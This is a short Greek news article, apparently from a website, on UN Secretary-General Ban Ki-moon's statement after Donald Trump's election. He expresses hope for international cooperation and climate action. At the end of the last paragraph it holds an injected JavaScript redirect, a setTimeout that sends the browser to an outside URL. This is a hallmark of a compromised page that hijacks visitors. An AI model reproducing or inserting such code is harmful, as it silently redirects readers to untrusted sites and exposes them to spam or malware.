Μπαν κι Μουν: Ελπίζω ο Ντόναλντ Τραμπ να ενισχύσει τη διεθνή συνεργασία

0
7

 

 Tην ελπίδα ότι η αμερικανική κυβέρνηση υπό τον Ντόναλντ Τραμπ θα «ενισχύσει τους δεσμούς της διεθνούς συνεργασίας» εξέφρασε μιλώντας σε δημοσιογράφους ο γενικός γραμματέας του Οργανισμού Ηνωμένων Εθνών Μπαν κι Μουν, ενώ χαρακτήρισε την Χίλαρι Κλίντον ως «ένα ισχυρό σύμβολο της χειραφέτησης των γυναικών».

«Την επομένη μιας σκληρής και πολύ συχνά διχαστικής εκστρατείας, αξίζει να επαναλάβουμε και να επιβεβαιώσουμε ότι η ενότητα στη διαφορετικότητα των ΗΠΑ είναι ένα από τα πιο δυνατά σημεία της χώρας. Ενθαρρύνω όλους τους Αμερικανούς να παραμείνουν αληθινοί σε αυτό το πνεύμα» δήλωσε ο Μπαν Κι Μουν μετά την εκλογική νίκη του νέου προέδρου των ΗΠΑ.

«Οι πολίτες σε ολόκληρο τον κόσμο παρακολουθούν τις ΗΠΑ προκειμένου να χρησιμοποιήσουν την απίστευτη δύναμή τους ώστε να βοηθήσουν την ανθρωπότητα να ξανασταθεί στα πόδια της και να εργαστούν για το κοινό καλό» είπε.

Επιπλέον ο γενικός γραμματέας του ΟΗΕ σημείωσε ότι βασίζεται στον νεοεκλεγέντα πρόεδρο των ΗΠΑ Ντόναλντ Τραμπ, προκειμένου να συμβάλλει στη μάχη για την καταπολέμηση της κλιματικής αλλαγής και να προωθήσει τα ανθρώπινα δικαιώματα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here